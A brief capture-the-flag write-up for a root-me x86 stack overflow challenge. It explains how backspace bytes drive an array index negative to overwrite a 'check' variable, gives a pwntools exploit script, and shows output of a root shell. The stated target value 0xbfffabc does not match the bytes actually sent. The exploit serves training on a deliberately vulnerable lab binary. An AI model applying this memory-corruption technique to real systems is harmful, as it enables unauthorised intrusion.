x86 stack overflow basic3

general

from the code source we found:
* we could control the index of array buffer to be a negative value,an important feature of array is that we could read or write the content near the base address of an array.
* send 0x08 to make index value count point to right area(check),then send 0xbfffabc

step

locate the check position:

char buffer[64];
int check;
int i = 0;
int count = 0;

so its stack layout is:

buffer array           //buffer[8]
buffer array           //buffer[4]
buffer base address   //buffer[0]
check                 //buffer[-4]
i
count                 //low address

send four bytes \x08 make count be -4
send little endian 0xbfffabc

exploit

from pwn import *
p = process('./ch16')
p.recvuntil(':')
p.sendline('\x08'*4 + '\xbc\xfa\xff\xbf')
p.interactive()

run it:

 ⚡ root@pwn  /mnt/hgfs/pwnexc/root-me/x86 bof b3  python exp_ch16.py
[+] Starting local process './ch16': pid 3873
[*] Switching to interactive mode
 $ id
uid=0(root) gid=0(root) 组=0(root)
 $